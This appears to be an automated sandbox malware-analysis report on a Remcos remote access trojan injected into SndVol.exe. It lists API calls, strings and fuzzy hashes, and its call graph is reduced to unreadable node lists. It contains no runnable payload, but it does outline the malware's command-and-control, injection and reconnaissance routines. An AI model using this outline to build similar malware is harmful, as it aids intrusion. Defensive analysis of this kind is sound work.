• Opcode Fuzzy Hash: dd7b4757b97bf688166755cfe30f3dfbd164df628d99ed34b4bcee6c45f51314
• Instruction Fuzzy Hash: 6C014B72740344EFEB02EEA4EC51B5A77ADEB49B40F514460B940D6740DA74AD109A24
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 02DEB9AE
  • Part of subcall function 02DEB963: std::exception::exception.LIBCONCRT ref: 02DEB970
• __CxxThrowException@8.LIBVCRUNTIME ref: 02DEB9BC
  • Part of subcall function 02DEC27F: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 02DEC28C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
• String ID: T=G
• API String ID: 64778976-379896819
• Opcode ID: b8cbe4ebc7b41fd1c5cd74919f6de3e9f6675d661c96ad503d5562b8015eb70c
• Instruction ID: 30bb73a4becc9aec8eb79587044201d248a61e34b42a316422601e5fd9ea2f6e
• Opcode Fuzzy Hash: b8cbe4ebc7b41fd1c5cd74919f6de3e9f6675d661c96ad503d5562b8015eb70c
• Instruction Fuzzy Hash: 7CE0D826D512186B8F00B67DEC419CE739DDD65725B818037E91AE3210EB685D458AF8
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4AF58
• IsBadWritePtr.KERNEL32(?,00000004), ref: 02D4AF88
• IsBadReadPtr.KERNEL32(?,00000008), ref: 02D4AFA7
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02D4AFB3
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0
• Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
• Instruction ID: ff5d07aa2ebba0ef9811bb4dfbb4e251ed13d708d4d1b71fab4d40cf3ad0be1c
• Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                        • Instruction Fuzzy Hash: 1321B4B268061AABDB11DF69CC80BAE73A9FF84351F004651FD14973C0DB34EC11CAA4

Execution Graph

Execution Coverage:2.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:4.1%
Total number of Nodes:992
Total number of Limit Nodes:49
execution_graph: the rendered call graph did not survive text extraction; only node identifiers, code addresses and edge pairs remain, so the graph layout is not reproduced here. Windows API routines named in the surviving graph nodes: DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, recv, send, RtlAllocateHeap, RtlReAllocateHeap, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetStartupInfoW, LoadLibraryA, GetProcAddress, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameW, FindResourceA, LoadResource, LockResource, SizeofResource, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegQueryValueExW, RegCreateKeyA, RegSetValueExA, RegDeleteValueW, RegCloseKey, CreateProcessA, CloseHandle, CreateMutexA, GetLastError, CreateThread, CreateEventA, CreateEventW, WaitForSingleObject, StrToIntA, GetComputerNameExW, GetUserNameW, GetLocalTime, GetTickCount, GetLongPathNameW, SetProcessDEPPolicy, DeleteFileW, Sleep, WSAStartup, WSAGetLastError, WSASetLastError, getaddrinfo, socket, connect. The remaining node labels are CRT-internal symbols (for example ___scrt_fastfail, ___crtLCMapStringA, _strftime, __dosmaperr, _Atexit, _wcslen, pre_c_initialization).
47153->47151 47157 2924306 47153->47157 47159 2921f66 28 API calls 47154->47159 47156 292440b 47254 2924c9e 28 API calls 47156->47254 47168 2924315 47157->47168 47169 292434c 47157->47169 47161 2924448 47158->47161 47162 29242e3 47159->47162 47165 2921f66 28 API calls 47161->47165 47163 293a686 79 API calls 47162->47163 47163->47166 47164 2924418 47167 2921f66 28 API calls 47164->47167 47170 2924457 47165->47170 47242 2940151 27 API calls 47166->47242 47171 2924427 47167->47171 47173 2921f66 28 API calls 47168->47173 47250 2940f34 53 API calls 47169->47250 47174 293a686 79 API calls 47170->47174 47175 293a686 79 API calls 47171->47175 47177 2924324 47173->47177 47174->47146 47178 292442c 47175->47178 47176 2924354 47179 2924389 47176->47179 47180 2924359 47176->47180 47181 2921f66 28 API calls 47177->47181 47183 2921eea 11 API calls 47178->47183 47252 29402ea 28 API calls 47179->47252 47184 2921f66 28 API calls 47180->47184 47185 2924333 47181->47185 47183->47146 47187 2924368 47184->47187 47188 293a686 79 API calls 47185->47188 47186 2924391 47189 29243be CreateEventW CreateEventW 47186->47189 47192 2921f66 28 API calls 47186->47192 47190 2921f66 28 API calls 47187->47190 47191 2924338 47188->47191 47189->47146 47193 2924377 47190->47193 47243 2940191 47191->47243 47195 29243a7 47192->47195 47196 293a686 79 API calls 47193->47196 47197 2921f66 28 API calls 47195->47197 47198 292437c 47196->47198 47199 29243b6 47197->47199 47251 2940592 51 API calls 47198->47251 47201 293a686 79 API calls 47199->47201 47202 29243bb 47201->47202 47202->47189 47204 2924805 SetEvent CloseHandle 47203->47204 47205 292481c closesocket 47203->47205 47206 292489c 47204->47206 47207 2924829 47205->47207 47206->46782 47208 2924838 47207->47208 47209 292483f 47207->47209 47257 2924ab1 83 API calls 47208->47257 47211 2924892 SetEvent CloseHandle 47209->47211 47212 2924851 WaitForSingleObject 47209->47212 47211->47206 47213 2940191 3 API calls 47212->47213 47214 2924860 SetEvent 
WaitForSingleObject 47213->47214 47215 2940191 3 API calls 47214->47215 47216 2924878 SetEvent CloseHandle CloseHandle 47215->47216 47216->47211 47217->46782 47218->46782 47219->46782 47220->46782 47221->46782 47222->46782 47223->46782 47224->46802 47225->46802 47226->46802 47227->46802 47228->46802 47229->46802 47230->46802 47231->46802 47232->46802 47233->46802 47234->47120 47235->47127 47236->47135 47237->47137 47241 2924b29 101 API calls 47238->47241 47240 2924b26 47241->47240 47242->47153 47244 293dc15 47243->47244 47245 2940199 47243->47245 47246 293dc23 47244->47246 47255 293cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47244->47255 47245->47146 47256 293d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47246->47256 47249 293dc2a 47250->47176 47251->47191 47252->47186 47253->47156 47254->47164 47255->47246 47256->47249 47257->47209 47259->46846 47260->46873 47261->46872 47262->46861 47263->46865 47264->46871 47267 292e56a 47265->47267 47266 29324b7 3 API calls 47266->47267 47267->47266 47269 292e60e 47267->47269 47271 292e5fe Sleep 47267->47271 47278 292e59c 47267->47278 47301 29282dc 28 API calls 47269->47301 47271->47267 47272 293ae08 28 API calls 47272->47278 47273 292e619 47275 293ae08 28 API calls 47273->47275 47276 292e625 47275->47276 47302 2932774 14 API calls 47276->47302 47278->47271 47278->47272 47280 2921e13 11 API calls 47278->47280 47283 2921f66 28 API calls 47278->47283 47287 29326d2 14 API calls 47278->47287 47298 292bf04 73 API calls ___scrt_fastfail 47278->47298 47299 29282dc 28 API calls 47278->47299 47300 2932774 14 API calls 47278->47300 47280->47278 47281 292e638 47282 2921e13 11 API calls 47281->47282 47284 292e644 47282->47284 47283->47278 47285 2921f66 28 API calls 47284->47285 47286 292e655 47285->47286 47288 29326d2 14 API calls 47286->47288 47287->47278 47289 292e668 47288->47289 47303 2931699 TerminateProcess WaitForSingleObject 47289->47303 47291 292e670 ExitProcess 47304 2931637 61 API 
calls 47293->47304 47299->47278 47300->47278 47301->47273 47302->47281 47303->47291 47305 295a998 47307 295a9a4 _swprintf CallCatchBlock 47305->47307 47306 295a9b2 47321 2965354 20 API calls __dosmaperr 47306->47321 47307->47306 47309 295a9dc 47307->47309 47316 2964acc EnterCriticalSection 47309->47316 47311 295a9b7 pre_c_initialization __wsopen_s 47312 295a9e7 47317 295aa88 47312->47317 47316->47312 47319 295aa96 47317->47319 47318 295a9f2 47322 295aa0f LeaveCriticalSection std::_Lockit::~_Lockit 47318->47322 47319->47318 47323 2968416 36 API calls 2 library calls 47319->47323 47321->47311 47322->47311 47323->47319 47324 2922bcc 47325 2922bd7 47324->47325 47326 2922bdf 47324->47326 47342 2923315 28 API calls __Getctype 47325->47342 47328 2922beb 47326->47328 47332 29215d3 47326->47332 47329 2922bdd 47334 295360d 47332->47334 47333 295a88c ___crtLCMapStringA 21 API calls 47333->47334 47334->47333 47335 2922be9 47334->47335 47338 295362e std::_Facet_Register 47334->47338 47343 2962200 7 API calls 2 library calls 47334->47343 47337 2953dec std::_Facet_Register 47345 2957bd7 RaiseException 47337->47345 47338->47337 47344 2957bd7 RaiseException 47338->47344 47341 2953e09 47342->47329 47343->47334 47344->47337 47345->47341

Control-flow Graph

APIs
  • Part of subcall function 029324B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 029324D7
  • Part of subcall function 029324B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,029942F8), ref: 029324F5
  • Part of subcall function 029324B7: RegCloseKey.KERNELBASE(?), ref: 02932500
• Sleep.KERNELBASE(00000BB8), ref: 0292E603
• ExitProcess.KERNEL32 ref: 0292E672
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: CloseExitOpenProcessQuerySleepValue
• String ID: 5.3.0 Pro$override$pth_unenc
• API String ID: 2281282204-531312966
• Opcode ID: 074833c94bbcb3a9120b045a3a33594ab685bad092a2aee2fa5c80f3f3cbf936
• Instruction ID: f98233a3284a8fe8daf1276ebb48f191859e7f919047282c37e2c7edba63761c
• Opcode Fuzzy Hash: 074833c94bbcb3a9120b045a3a33594ab685bad092a2aee2fa5c80f3f3cbf936
• Instruction Fuzzy Hash: DA212B21F1032027EA097A788C5AA7F36DF6BD1710F84041CE45A5B2DEEE619E188BD3

Control-flow Graph
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,029526C2,00000024,?,?,?), ref: 0295294C
• CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0294CBBE,?), ref: 02952962
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0294CBBE,?), ref: 02952974
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 232473f7a88c193ccfb36d9f152648ce1c9c5913579cee66bc9bf13531c05a53
• Instruction ID: 4c13f0e8cc3278142332307e9b577cc04f632da973c0736c4fce27bafa942165
• Opcode Fuzzy Hash: 232473f7a88c193ccfb36d9f152648ce1c9c5913579cee66bc9bf13531c05a53
• Instruction Fuzzy Hash: CFE0923174C221BBEB314F21EC28FA76B58EF86B70F240D28FA11E41D4C2614455C758

APIs
• GetComputerNameExW.KERNELBASE(00000001,?,0000002B,02994358), ref: 0293A7BF
• GetUserNameW.ADVAPI32(?,0292DFC3), ref: 0293A7D7
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
• Opcode ID: d6655580485b093fba16e02f04e1a806cbda8bfecbf81f253d7c00cd26cddd34
• Instruction ID: 24e1d5e4c9b00df479361349c39b90e9da7286215a0f685582939c022902dd96
• Opcode Fuzzy Hash: d6655580485b093fba16e02f04e1a806cbda8bfecbf81f253d7c00cd26cddd34
• Instruction Fuzzy Hash: 5901627290011CABDF04EB90DC54EEEB77DEF84310F100166A402B3194EFB4AA8D8F98

Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: recv
• String ID:
• API String ID: 1507349165-0
• Opcode ID: 77b03e3c221bb01114aa2ce06bb2f174b0adb35e0095cfcd144affa2384fd464
• Instruction ID: d0d167a0765d03ab52a327dfac46ca9ecbb325b9c565e1c5c00b16622db11333
• Opcode Fuzzy Hash: 77b03e3c221bb01114aa2ce06bb2f174b0adb35e0095cfcd144affa2384fd464
• Instruction Fuzzy Hash: 0DB09B75508201FF871517A0CC0487ABE7797CC240F008D1DB54640130C53284549721

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0293BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BD18
• GetProcAddress.KERNEL32(00000000), ref: 0293BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0293BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD41
• GetProcAddress.KERNEL32(00000000), ref: 0293BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0292D783), ref: 0293BD55
• GetProcAddress.KERNEL32(00000000), ref: 0293BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0292D783), ref: 0293BD65
• GetProcAddress.KERNEL32(00000000), ref: 0293BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0292D783), ref: 0293BD75
• GetProcAddress.KERNEL32(00000000), ref: 0293BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0292D783), ref: 0293BD85
• GetProcAddress.KERNEL32(00000000), ref: 0293BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0292D783), ref: 0293BD99
• GetProcAddress.KERNEL32(00000000), ref: 0293BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0292D783), ref: 0293BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0293BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0292D783), ref: 0293BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0293BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0292D783), ref: 0293BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0293BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0292D783), ref: 0293BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0293BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0292D783), ref: 0293BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0293BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0292D783), ref: 0293BE06
• GetProcAddress.KERNEL32(00000000), ref: 0293BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0292D783), ref: 0293BE16
• GetProcAddress.KERNEL32(00000000), ref: 0293BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0292D783), ref: 0293BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0293BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0292D783), ref: 0293BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0293BE3E
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0292D783), ref: 0293BE50
• GetProcAddress.KERNEL32(00000000), ref: 0293BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0292D783), ref: 0293BE60
• GetProcAddress.KERNEL32(00000000), ref: 0293BE63
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0553557848a05eab65fa330b85122649301bf2374f57d63c5972b185a09ba71e
• Instruction ID: 2b61c1ca5cf560eab7a0eac2b1c240a6894dcc214886e71f9361ee3f13d59f29
• Opcode Fuzzy Hash: 0553557848a05eab65fa330b85122649301bf2374f57d63c5972b185a09ba71e
• Instruction Fuzzy Hash: A831F2A1D8431C7DFA107FBA9C6DC3FBF9CD98496830D0C6AB505D3142DA7898148EA8

Control-flow Graph
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BCF8
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD01
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0292D783), ref: 0293BD18
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD1B
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD2D
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD30
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0292D783), ref: 0293BD41
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD44
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0292D783), ref: 0293BD55
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD58
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0292D783), ref: 0293BD65
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD68
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0292D783), ref: 0293BD75
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD78
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0292D783), ref: 0293BD85
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD88
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0292D783), ref: 0293BD99
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BD9C
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0292D783), ref: 0293BDA9
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDAC
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0292D783), ref: 0293BDBD
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDC0
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0292D783), ref: 0293BDD1
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDD4
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0292D783), ref: 0293BDE5
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDE8
                                                                                                                          • Part of subcall function 0293BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0292D783), ref: 0293BDF5
                                                                                                                          • Part of subcall function 0293BCE3: GetProcAddress.KERNEL32(00000000), ref: 0293BDF8
                                                                                                                          • Part of subcall function 0293BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0292D783), ref: 0293BE06
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 0292D790
                                                                                                                          • Part of subcall function 0292FCBA: __EH_prolog.LIBCMT ref: 0292FCBF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                        • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                                                        • API String ID: 2830904901-1478563138
                                                                                                                        • Opcode ID: 484f106dd2cbd512dc41df90529999ed412c8185d21a447bafcc2d60897da2c2
                                                                                                                        • Instruction ID: e14c2d85aa3f3cfca0ebb1fe7aadacb6cd768a7887b63a64ed7cd0ea659173d8
                                                                                                                        • Opcode Fuzzy Hash: 484f106dd2cbd512dc41df90529999ed412c8185d21a447bafcc2d60897da2c2
                                                                                                                        • Instruction Fuzzy Hash: 5B320820B443A06BEE19B774AC55B7F36CF9FC1710F04042DA44A5B2CEDEA49D1D8BA2

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,00000029,029942F8,?,00000000), ref: 02934028
                                                                                                                        • WSAGetLastError.WS2_32 ref: 02934249
                                                                                                                        • Sleep.KERNELBASE(00000000,00000002), ref: 02934B88
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                                        • String ID: | $%I64u$5.3.0 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                                                                        • API String ID: 524882891-4083769289
                                                                                                                        • Opcode ID: 5782a1c75d26d9b1a3f9c79f036cda7b2b81ad8051da0a447b7e4bcc5bedc9a9
                                                                                                                        • Instruction ID: ebf51167b86d534db101840d303cac0ec359a41050ab7488f3c2786111fe574c
                                                                                                                        • Opcode Fuzzy Hash: 5782a1c75d26d9b1a3f9c79f036cda7b2b81ad8051da0a447b7e4bcc5bedc9a9
                                                                                                                        • Instruction Fuzzy Hash: BC529D32E001249BDB19F774ECA1AEE737A9FE0310F5040ADD80AA6199EE706F5DCE55

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • connect.WS2_32(?,?,?), ref: 029242A5
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0292192B), ref: 029243CB
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0292192B), ref: 029243D5
                                                                                                                        • WSAGetLastError.WS2_32(?,?,?,0292192B), ref: 029243E7
                                                                                                                          • Part of subcall function 0293A686: GetLocalTime.KERNEL32(00000000), ref: 0293A6A0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                        • API String ID: 994465650-2151626615
                                                                                                                        • Opcode ID: 1b60ad30ea10798df8cf40a4f4a43d7b1c0e9c68f69ddbebf63ceb132be77482
                                                                                                                        • Instruction ID: 7f655b372e8f92edffd01c09a53a254bd6bf60b6d835d6e7ac95cccba4a51669
                                                                                                                        • Opcode Fuzzy Hash: 1b60ad30ea10798df8cf40a4f4a43d7b1c0e9c68f69ddbebf63ceb132be77482
                                                                                                                        • Instruction Fuzzy Hash: 3A417071F00221B7EB04B77D8D0A87D7B5BEBC03247810129D41A0768AEF51A92C8BD3

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 029247FD
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924808
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924811
                                                                                                                        • closesocket.WS2_32(000000FF), ref: 0292481F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924856
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 02924867
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0292486E
                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02924880
